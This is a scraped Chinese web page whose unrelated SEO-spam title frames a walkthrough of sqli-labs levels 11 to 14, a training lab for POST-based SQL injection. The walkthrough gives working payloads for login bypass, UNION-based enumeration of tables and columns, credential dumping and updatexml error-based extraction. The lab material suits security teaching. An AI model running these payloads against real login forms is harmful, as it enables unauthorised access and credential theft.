当前位置: 首页 > news >正文

高端建站需要什么条件全国互联网营销大赛官网

news 2025/8/7 15:53:47
高端建站需要什么条件,全国互联网营销大赛官网,马云做网站最早,wordpress 调用分类目录描述前言 第1-10关都是get方法,本关开始进入post方法。其实post也好get也好,本质都差不多,使用的技巧也基本相同。 Less11 第11关打开是一个输入用户名密码的界面 显然登陆对话框会使用post方式提交,这里我们尝试在Username一栏通过…

前言

第1-10关都是get方法,本关开始进入post方法。其实post也好get也好,本质都差不多,使用的技巧也基本相同。

Less11

第11关打开是一个输入用户名密码的界面

显然登陆对话框会使用post方式提交,这里我们尝试在Username一栏通过单引号闭合看看什么效果:

提示有个报错,看来就是单引号闭合,那可以肯定这里有个注入点,在Username框尝试(注意每个输入前面都有个单引号+空格!是闭合变量用的,不是手误):

' or 1=1 -- asd

 是不是发现和第一关的get方法效果类似!既然有回显,那就尝试通过联合注入的方式,先看看有多少列,在Username框输入:

' union select 1 -- asd

这里报错了,表示union后的列数不对,当我们尝试:

' union select 1,2 -- asd

不仅对了,而且还把联合注入部分回显到页面,和第一关类似。那接下来就是获取数据库命了,在Username框输入:

' union select database(),2 -- asd

得到数据库名为security。接着就是获取表名:

' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) -- asd

显然users应该就是我们要找的表,然后是查找列名:

' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users') -- asd

 列名中username和password应该就是我们要找的列,然后查出用户名和密码:

' union select 1,(select group_concat(username) from users) -- asd

' union select 1,(select group_concat(password) from users) -- asd

通关!

Less12

第十二关先输入单引号

显示错误,再输入双引号:

 看报错信息,应该是双引号和括号作为闭合,测试一下,在Username框输入:

") or 1=1 -- asd

成功,那就确定了通过双引号+括号闭合。剩下的参考第11关即可,不再复述。

Less13

第13关先测试单引号

看来是单引号+括号的闭合,再测试:

') or 1=1 -- asd

确定了单引号+括号的闭合,但是这里没有登陆正确的回显。不过有错误的回显,所以可以利用updatexml大法来处理,和第五关的处理方式类似。在Username框输入:

') or updatexml('1',concat('~',database(),'~'),'1') -- asd

找出了数据库名为security。然后找出对应表名,Username对话框输入:

') or updatexml('1',concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'~'),'1')  -- asd

 第一个表是emails,我们逐个尝试,当输入:

') or updatexml('1',concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'~'),'1')  -- asd

找出了users表。接着是列名,同样我们逐个尝试后,在输入以下两条时找到了username和password列名:

') or updatexml('1',concat('~',(select column_name from information_schema.columns where table_name='users' limit 4,1),'~'),'1')  -- asd
') or updatexml('1',concat('~',(select column_name from information_schema.columns where table_name='users' limit 5,1),'~'),'1')  -- asd

之后找出用户名,Username框输入:

') or updatexml('1',concat('~',(select username from security.users limit 0,1),'~'),'1')  -- asd

 

密码:

') or updatexml('1',concat('~',(select password from security.users limit 0,1),'~'),'1')  -- asd

通关!

Less14

第14关和13关类似,区别仅在于通过双引号闭合,其余都一样,不另外叙述。

http://www.mnyf.cn/news/15112.html

相关文章:

  • 哪个网站能学做微商重庆百度小额贷款有限公司
  • 企业信息系统定义网站优化服务
  • 南汇集团网站建设大数据营销案例
  • 厦门市城市建设档案馆网站51外链代发网
  • 营销型网站建设营销型丈哥seo博客工具
  • 枣庄网站建设.com百度站长工具如何使用
  • 网站上的动图axure怎么做淘宝运营培训班
  • 软件系统网站建设seosem是什么职位
  • 上海智能网站建设平台友情视频
  • 山西网站建设软件怎么创建自己的游戏网站
  • 长沙营销网站建设公司百度之家
  • 华大网站建设如何制作网站链接
  • 网站点击按钮回到页面顶部怎么做成功营销案例分享
  • 淄企业网站建设公司成都专门做网站的公司
  • 公司做网站可以用个人域名搜索引擎营销是什么意思
  • 淮安软件园有做网站的吗足球世界排名一览表
  • 网站上做百度广告赚钱么搜索排名广告营销怎么做
  • 西安做网站公司哪家好黄冈便宜的网站推广怎么做
  • 在什么网站可以自承包活来做emlog友情链接代码
  • asp动态网站开发基础教程(第4版)网络销售真恶心
  • 做网站怎么报价谷歌app下载
  • 设计师培训生招聘seo自动工具
  • 东阳做网站公司全网推广平台有哪些
  • 微信官方网页版河北百度推广seo
  • 学校网站建设项目要多少钱磁力搜索引擎
  • 免费行情软件app网站下载大全安卓电销外包团队在哪找
  • 好书推荐ppt模板免费下载seo范畴有哪些
  • 英文wordpress 安装网站页面seo
  • 网站做收付款接口重庆营销型网站建设公司
  • wordpress建网站详细教程营销型网站建设推荐